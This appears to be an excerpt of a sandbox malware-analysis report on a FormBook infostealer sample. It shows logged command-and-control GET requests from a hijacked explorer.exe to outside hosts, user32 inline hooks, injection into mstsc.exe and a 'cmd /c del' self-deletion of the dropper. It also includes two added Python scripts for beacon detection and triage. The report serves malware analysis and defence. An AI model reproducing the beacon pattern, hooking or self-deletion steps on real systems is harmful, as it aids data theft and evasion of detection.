Nov 26, 2020 09:57:21.599386930 CET | 24 | OUT | GET /sbmh/?4hLtM4=7c1Yf2hXTdqRFKk5H17xFHcZtn6ZaViryhouZ8x83IEcsjPhhroi25cpiHSX6hk8gWCa&n0DXRn=xPJxZNG0xPz HTTP/1.1
                                              Host: www.westhighlandwaytours.com
                                              Connection: close
                                              Data Raw: 00 00 00 00 00 00 00
                                              Data Ascii:
Nov 26, 2020 09:57:21.714304924 CET | 24 | IN | HTTP/1.1 403 Forbidden
                                              Server: openresty
                                              Date: Thu, 26 Nov 2020 08:57:21 GMT
                                              Content-Type: text/html
                                              Content-Length: 275
                                              ETag: "5fb7c9ca-113"
                                              Via: 1.1 google
                                              Connection: close
                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                              Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
1 | 192.168.2.4 | 49712 | 23.227.38.74 | 80 | C:\Windows\explorer.exe
Timestamp | kBytes transferred | Direction | Data
Nov 26, 2020 09:57:41.985487938 CET | 50 | OUT | GET /sbmh/?4hLtM4=skYwVssfaMrhlhDh0By1+2yNFudwvP+0WfyEru4f7dWeU3QH+Wh99HLFJYHhc5Wxp3Js&n0DXRn=xPJxZNG0xPz HTTP/1.1
                                              Host: www.bloochy.com
                                              Connection: close
                                              Data Raw: 00 00 00 00 00 00 00
                                              Data Ascii:
Nov 26, 2020 09:57:42.153270960 CET | 51 | IN | HTTP/1.1 403 Forbidden
                                              Date: Thu, 26 Nov 2020 08:57:42 GMT
                                              Content-Type: text/html
                                              Transfer-Encoding: chunked
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Sorting-Hat-PodId: 167
                                              X-Sorting-Hat-ShopId: 45989331112
                                              X-Dc: gcp-us-central1
                                              X-Request-ID: f0326ea8-ce8b-479d-8dcb-cb43ea808d5c
                                              X-Download-Options: noopen
                                              X-Permitted-Cross-Domain-Policies: none
                                              X-Content-Type-Options: nosniff
                                              X-XSS-Protection: 1; mode=block
                                              CF-Cache-Status: DYNAMIC
                                              cf-request-id: 06a55edf67000032587c094000000001
                                              Server: cloudflare
                                              CF-RAY: 5f826745793b3258-FRA
                                              Data Raw: 31 34 31 64 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 65 66 65 72 72 65 72 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 65 76 65 72 22 20 2f 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 41 63 63 65 73 73 20 64 65 6e 69 65 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 2a 7b 62 6f 78 2d 73 69 7a 69 6e 67 3a 62 6f 72 64 65 72 2d 62 6f 78 3b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 22 48 65 6c 76 65 74 69 63 61 20 4e 65 75 65 22 2c 48 65 6c 76 65 74 69 63 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 46 31 46 31 46 31 3b 66 6f 6e 74 2d 73 69 7a 65 3a 36 32 2e 35 25 3b 63 6f 6c 6f 72 3a 23 33 30 33 30 33 30 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 7d 62 6f 64 79 7b 70 61 64 64 69 6e 67 3a 30 3b 6d 61 72 67 69 6e 3a 30 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 32 2e 37 72 65 6d 7d 61 7b 63 6f 6c 6f 72 3a 23 33 30 33 30 33 30 3b 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 31 70 78 20 73 6f 6c 69 64 20 23 33 30 33 30 33 30 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 62 6f 74 74 6f 6d 3a 31 72 65 6d 3b 74 72 61 6e 73 69 74 69 6f 6e 3a 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 20 30 2e 32 73 20 65 61 73 65 2d 69 6e 7d 61 3a 68 6f 76 65 72 7b 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 2d 63 6f 6c 6f 72 3a 23 41 39 41 39 41 39 7d 68 31 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 38 72 65 6d 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 34 30 30 3b 6d 61 72 67 69 6e 3a 30 20 30 20 31 2e 34 72 65 6d 20 30 7d 70 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 35 72 65 6d 3b 6d 61 72 67 69 6e 3a 30 7d 2e 
70 61 67 65 7b 70 61 64 64 69 6e 67 3a 34 72 65 6d 20 33 2e 35 72 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 64 69 73 70 6c 61 79 3a 66 6c 65 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 76 68 3b 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 3a 63 6f 6c 75 6d 6e 7d 2e 74 65 78 74 2d 63 6f 6e 74 61 69 6e 65 72 2d 2d 6d 61 69 6e 7b 66 6c 65 78 3a 31 3b 64 69 73 70 6c 61 79 3a 66 6c 65 78 3b 61 6c 69 67 6e 2d 69 74
                                              Data Ascii: 141d<!DOCTYPE html><html lang="en"><head> <meta charset="utf-8" /> <meta name="referrer" content="never" /> <title>Access denied</title> <style type="text/css"> *{box-sizing:border-box;margin:0;padding:0}html{font-family:"Helvetica Neue",Helvetica,Arial,sans-serif;background:#F1F1F1;font-size:62.5%;color:#303030;min-height:100%}body{padding:0;margin:0;line-height:2.7rem}a{color:#303030;border-bottom:1px solid #303030;text-decoration:none;padding-bottom:1rem;transition:border-color 0.2s ease-in}a:hover{border-bottom-color:#A9A9A9}h1{font-size:1.8rem;font-weight:400;margin:0 0 1.4rem 0}p{font-size:1.5rem;margin:0}.page{padding:4rem 3.5rem;margin:0;display:flex;min-height:100vh;flex-direction:column}.text-container--main{flex:1;display:flex;align-it
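
The two sessions above have one URI shape in common: path /sbmh/, the same two query keys in the same order, an identical second value (n0DXRn=xPJxZNG0xPz) while the long first value changes per request, a Connection: close header, and explorer.exe as the originating process; both hosts answered 403 (openresty behind Google, Cloudflare in front of Shopify), so neither served the requested path. The following Python is an added example, not code from the Joe Sandbox report, that pivots on that shape across hosts. The sample input is the two requests from this section plus one constructed benign request; the 16-character cut-off that separates a fixed tag from the per-request blob, and the list of processes that are not expected to originate HTTP, are assumptions.

```python
"""Pivot on the FormBook-style HTTP beacon seen above: one URI shape reused
against several unrelated hosts by a process that should not speak HTTP.
Added example; it is not code from the Joe Sandbox report."""
import re
from collections import defaultdict
from urllib.parse import urlsplit

# Constructed input: (originating process, raw request) for the two GETs in the
# HTTP Packets section, plus one assumed benign request as a negative case.
SAMPLE_REQUESTS = [
    (r"C:\Windows\explorer.exe",
     "GET /sbmh/?4hLtM4=7c1Yf2hXTdqRFKk5H17xFHcZtn6ZaViryhouZ8x83IEcsjPhhroi25cpiHSX6hk8gWCa"
     "&n0DXRn=xPJxZNG0xPz HTTP/1.1\r\nHost: www.westhighlandwaytours.com\r\nConnection: close\r\n\r\n"),
    (r"C:\Windows\explorer.exe",
     "GET /sbmh/?4hLtM4=skYwVssfaMrhlhDh0By1+2yNFudwvP+0WfyEru4f7dWeU3QH+Wh99HLFJYHhc5Wxp3Js"
     "&n0DXRn=xPJxZNG0xPz HTTP/1.1\r\nHost: www.bloochy.com\r\nConnection: close\r\n\r\n"),
    (r"C:\Program Files\Browser\browser.exe",  # assumed benign traffic
     "GET /index.html HTTP/1.1\r\nHost: www.example.com\r\nConnection: keep-alive\r\n\r\n"),
]

REQUEST_LINE = re.compile(r"^(?P<method>[A-Z]+) (?P<target>\S+) HTTP/1\.[01]$")
FIXED_TAG_MAX_LEN = 16              # assumption: values this short are a fixed tag, longer ones the per-request blob
NO_HTTP_EXPECTED = {"explorer.exe"}  # assumption: shell processes that never originate plain HTTP themselves


def _basename(path):
    return path.rsplit("\\", 1)[-1].lower()


def _split_query(query):
    """Split the query string without URL-decoding, so '+' and '=' inside the
    encrypted blob survive intact (urllib.parse.parse_qs would turn '+' into ' ')."""
    pairs = {}
    for kv in filter(None, query.split("&")):
        key, _, value = kv.partition("=")
        pairs[key] = value
    return pairs


def parse_request(raw):
    """Parse a raw HTTP/1.x request into method, path, query dict and lower-cased headers."""
    head = raw.split("\r\n\r\n", 1)[0]
    lines = head.split("\r\n")
    m = REQUEST_LINE.match(lines[0])
    if not m:
        raise ValueError("not an HTTP request line: %r" % lines[0])
    target = urlsplit(m.group("target"))
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return {"method": m.group("method"), "path": target.path,
            "query": _split_query(target.query), "host": headers.get("host", ""),
            "headers": headers}


def beacon_shape(req):
    """What stays constant between check-ins: path, the query-key sequence and any
    short fixed tag (here n0DXRn=xPJxZNG0xPz); the long first value changes per request."""
    fixed = tuple(sorted((k, v) for k, v in req["query"].items() if len(v) <= FIXED_TAG_MAX_LEN))
    return (req["path"], tuple(req["query"]), fixed)


def find_shared_shapes(records, min_hosts=2):
    """Group GET-with-query requests by shape; keep shapes seen against >= min_hosts distinct hosts."""
    by_shape = defaultdict(set)
    for process, raw in records:
        req = parse_request(raw)
        if req["method"] == "GET" and req["query"]:
            by_shape[beacon_shape(req)].add((process, req["host"]))
    return {shape: hits for shape, hits in by_shape.items()
            if len({host for _, host in hits}) >= min_hosts}


def network_iocs(records):
    """host + path for every request that belongs to a shared beacon shape."""
    return sorted({host + shape[0] for shape, hits in find_shared_shapes(records).items()
                   for _, host in hits})


def flag_beacons(records):
    """{host: [reasons]} for requests that look like the check-ins above."""
    shared = find_shared_shapes(records)
    reasons = defaultdict(list)
    for process, raw in records:
        req = parse_request(raw)
        if req["method"] == "GET" and req["query"] and beacon_shape(req) in shared:
            reasons[req["host"]].append("uri shape %s reused across hosts" % req["path"])
        if _basename(process) in NO_HTTP_EXPECTED:
            reasons[req["host"]].append("originated by %s" % _basename(process))
    return dict(reasons)


if __name__ == "__main__":
    for host, why in flag_beacons(SAMPLE_REQUESTS).items():
        print(host, "->", "; ".join(why))
    print("IOCs:", network_iocs(SAMPLE_REQUESTS))
```

The shape key deliberately ignores the long first query value, which is what differs between the two requests, and keys on what repeats; with more captured sessions the same grouping also links the hosts that were only resolved here (www.edlasyarns.com, www.punebites.com) if they receive the same shape.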


                                              Code Manipulations

                                              User Modules

Hook Summary

Function Name | Hook Type | Active in Processes
PeekMessageA | INLINE | explorer.exe
PeekMessageW | INLINE | explorer.exe
GetMessageW | INLINE | explorer.exe
GetMessageA | INLINE | explorer.exe

                                              Processes

Process: explorer.exe, Module: user32.dll
Function Name | Hook Type | New Data
PeekMessageA | INLINE | 0x48 0x8B 0xB8 0x87 0x7E 0xE3
PeekMessageW | INLINE | 0x48 0x8B 0xB8 0x8F 0xFE 0xE3
GetMessageW | INLINE | 0x48 0x8B 0xB8 0x8F 0xFE 0xE3
GetMessageA | INLINE | 0x48 0x8B 0xB8 0x87 0x7E 0xE3


                                              System Behavior

                                              General

Start time: 09:56:19
Start date: 26/11/2020
Path: C:\Users\user\Desktop\PO98765.exe
Wow64 process (32bit): true
Commandline: 'C:\Users\user\Desktop\PO98765.exe'
Imagebase: 0x350000
File size: 688128 bytes
MD5 hash: 137EC800F9C49390F2F225AB22774443
Has elevated privileges: true
Has administrator privileges: true
Programmed in: .Net C# or VB.NET
Yara matches:
                                              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000000.00000002.679040055.0000000003741000.00000004.00000001.sdmp, Author: Joe Security
                                              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000000.00000002.679040055.0000000003741000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                              • Rule: Formbook, Description: detect Formbook in memory, Source: 00000000.00000002.679040055.0000000003741000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                              • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000000.00000002.678398737.0000000002741000.00000004.00000001.sdmp, Author: Joe Security
Reputation: low

                                              General

Start time: 09:56:28
Start date: 26/11/2020
Path: C:\Users\user\Desktop\PO98765.exe
Wow64 process (32bit): true
Commandline: C:\Users\user\Desktop\PO98765.exe
Imagebase: 0xab0000
File size: 688128 bytes
MD5 hash: 137EC800F9C49390F2F225AB22774443
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Yara matches:
                                              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000002.715786451.0000000001040000.00000040.00000001.sdmp, Author: Joe Security
                                              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000002.715786451.0000000001040000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                              • Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000002.715786451.0000000001040000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000002.715956692.00000000013F0000.00000040.00000001.sdmp, Author: Joe Security
                                              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000002.715956692.00000000013F0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                              • Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000002.715956692.00000000013F0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000002.714949083.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000002.714949083.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                              • Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000002.714949083.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
Reputation: low

                                              General

Start time: 09:56:30
Start date: 26/11/2020
Path: C:\Windows\explorer.exe
Wow64 process (32bit): false
Commandline:
Imagebase: 0x7ff6fee60000
File size: 3933184 bytes
MD5 hash: AD5296B280E8F522A8A897C96BAB0E1D
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high

                                              General

Start time: 09:56:43
Start date: 26/11/2020
Path: C:\Windows\SysWOW64\mstsc.exe
Wow64 process (32bit): true
Commandline: C:\Windows\SysWOW64\mstsc.exe
Imagebase: 0x1070000
File size: 3444224 bytes
MD5 hash: 2412003BE253A515C620CE4890F3D8F3
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Yara matches:
                                              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000003.00000002.923055372.0000000000F40000.00000004.00000001.sdmp, Author: Joe Security
                                              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000003.00000002.923055372.0000000000F40000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                              • Rule: Formbook, Description: detect Formbook in memory, Source: 00000003.00000002.923055372.0000000000F40000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000003.00000002.923022023.0000000000F10000.00000040.00000001.sdmp, Author: Joe Security
                                              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000003.00000002.923022023.0000000000F10000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                              • Rule: Formbook, Description: detect Formbook in memory, Source: 00000003.00000002.923022023.0000000000F10000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000003.00000002.922790825.0000000000C70000.00000040.00000001.sdmp, Author: Joe Security
                                              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000003.00000002.922790825.0000000000C70000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                              • Rule: Formbook, Description: detect Formbook in memory, Source: 00000003.00000002.922790825.0000000000C70000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
Reputation: moderate

                                              General

Start time: 09:56:47
Start date: 26/11/2020
Path: C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit): true
Commandline: /c del 'C:\Users\user\Desktop\PO98765.exe'
Imagebase: 0x11d0000
File size: 232960 bytes
MD5 hash: F3BDBE3BB6F734E357235F4D5898582D
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high

                                              General

Start time: 09:56:47
Start date: 26/11/2020
Path: C:\Windows\System32\conhost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase: 0x7ff724c50000
File size: 625664 bytes
MD5 hash: EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high
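
The process blocks above, read together with the Hook Summary, carry three tells a responder would check first: the second PO98765.exe instance and mstsc.exe hold FormBook Yara hits in memory, cmd.exe deletes the dropper from the desktop, and explorer.exe has its user32 message-loop functions inline-hooked. The following Python is an added example, not code from the Joe Sandbox report, that triages those records. The process list and hook names are transcribed from this page; the layout of the .sdmp source names (process index, dump index, id, base address, page protection, flags) is an assumption, with 0x40 and 0x04 read as the Windows PAGE_EXECUTE_READWRITE and PAGE_READWRITE constants, and the rule names are my own.

```python
"""Triage the System Behavior section: which processes hold FormBook in memory,
in what kind of region, and which process events are the injection/cleanup tells.
Added example; it is not code from the Joe Sandbox report."""
import re

# Transcribed from the process blocks above (path, command line, WOW64 flag, Yara
# match sources, user32 inline hooks from the Hook Summary).
PROCESSES = [
    {"path": r"C:\Users\user\Desktop\PO98765.exe", "wow64": True,
     "cmdline": r"'C:\Users\user\Desktop\PO98765.exe'", "hooks": [],
     "yara": ["00000000.00000002.679040055.0000000003741000.00000004.00000001.sdmp"]},
    {"path": r"C:\Users\user\Desktop\PO98765.exe", "wow64": True,
     "cmdline": r"C:\Users\user\Desktop\PO98765.exe", "hooks": [],
     "yara": ["00000001.00000002.715786451.0000000001040000.00000040.00000001.sdmp",
              "00000001.00000002.715956692.00000000013F0000.00000040.00000001.sdmp",
              "00000001.00000002.714949083.0000000000400000.00000040.00000001.sdmp"]},
    {"path": r"C:\Windows\explorer.exe", "wow64": False, "cmdline": "",
     "hooks": ["PeekMessageA", "PeekMessageW", "GetMessageW", "GetMessageA"], "yara": []},
    {"path": r"C:\Windows\SysWOW64\mstsc.exe", "wow64": True,
     "cmdline": r"C:\Windows\SysWOW64\mstsc.exe", "hooks": [],
     "yara": ["00000003.00000002.923055372.0000000000F40000.00000004.00000001.sdmp",
              "00000003.00000002.923022023.0000000000F10000.00000040.00000001.sdmp",
              "00000003.00000002.922790825.0000000000C70000.00000040.00000001.sdmp"]},
    {"path": r"C:\Windows\SysWOW64\cmd.exe", "wow64": True,
     "cmdline": r"/c del 'C:\Users\user\Desktop\PO98765.exe'", "hooks": [], "yara": []},
    {"path": r"C:\Windows\System32\conhost.exe", "wow64": False,
     "cmdline": r"C:\Windows\system32\conhost.exe 0xffffffff -ForceV1", "hooks": [], "yara": []},
]

# Assumed layout of a Joe Sandbox memory-dump name:
#   <process index>.<dump index>.<id>.<base address>.<page protection>.<flags>.sdmp
SDMP = re.compile(r"^(?P<proc>[0-9a-fA-F]{8})\.(?P<dump>[0-9a-fA-F]{8})\.(?P<id>\d+)\."
                  r"(?P<base>[0-9a-fA-F]{16})\.(?P<protect>[0-9a-fA-F]{8})\.(?P<flags>[0-9a-fA-F]{8})\.sdmp$")
PAGE_READWRITE = 0x04            # Windows page-protection constants (winnt.h)
PAGE_EXECUTE_READWRITE = 0x40


def basename(path):
    return path.rsplit("\\", 1)[-1].lower()


def parse_sdmp(name):
    """Decode a memory-dump name into process index, base address and protection."""
    m = SDMP.match(name)
    if not m:
        raise ValueError("unexpected dump name: %r" % name)
    protect = int(m.group("protect"), 16)
    return {"proc_index": int(m.group("proc"), 16), "base": int(m.group("base"), 16),
            "protect": protect, "rwx": protect == PAGE_EXECUTE_READWRITE}


def formbook_carriers(procs):
    """Process names with at least one FormBook Yara hit in memory."""
    return sorted({basename(p["path"]) for p in procs if p["yara"]})


def rwx_yara_regions(procs):
    """(process, base address) for each Yara hit inside an RWX region: the footprint
    of unpacked or injected code rather than a file-backed image section."""
    return [(basename(p["path"]), parse_sdmp(src)["base"])
            for p in procs for src in p["yara"] if parse_sdmp(src)["rwx"]]


def behaviour_tells(procs, sample_path):
    """Rules a responder checks first against this process list; returns (rule, process)."""
    tells = []
    sample = basename(sample_path)
    for p in procs:
        name = basename(p["path"])
        bare = p["cmdline"].strip().strip("'\"").lower() == p["path"].lower()
        if name == "cmd.exe" and re.search(r"\bdel\b", p["cmdline"], re.I) and sample in p["cmdline"].lower():
            tells.append(("dropper-self-delete", name))                  # cmd /c del <sample>
        if "\\syswow64\\" in p["path"].lower() and bare and p["yara"]:
            tells.append(("bare-syswow64-host-with-payload", name))      # 32-bit system binary used as injection host
        if name == "explorer.exe" and any(h.startswith(("GetMessage", "PeekMessage")) for h in p["hooks"]):
            tells.append(("explorer-message-loop-hooks", name))          # user32 message-loop APIs patched inline
    return tells


if __name__ == "__main__":
    print("carriers:", formbook_carriers(PROCESSES))
    for proc, base in rwx_yara_regions(PROCESSES):
        print("RWX FormBook region in %s at 0x%X" % (proc, base))
    for rule, proc in behaviour_tells(PROCESSES, r"C:\Users\user\Desktop\PO98765.exe"):
        print(rule, "<-", proc)
```

Five of the seven Yara hits sit in RWX regions, including one at 0x400000 in the second PO98765.exe instance whose own image base is reported as 0xab0000, which is the hollowed image the "Sample uses process hollowing technique" signature refers to; the RW hits (0x3741000 in the .NET stage, 0xF40000 in mstsc.exe) are data rather than mapped code.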
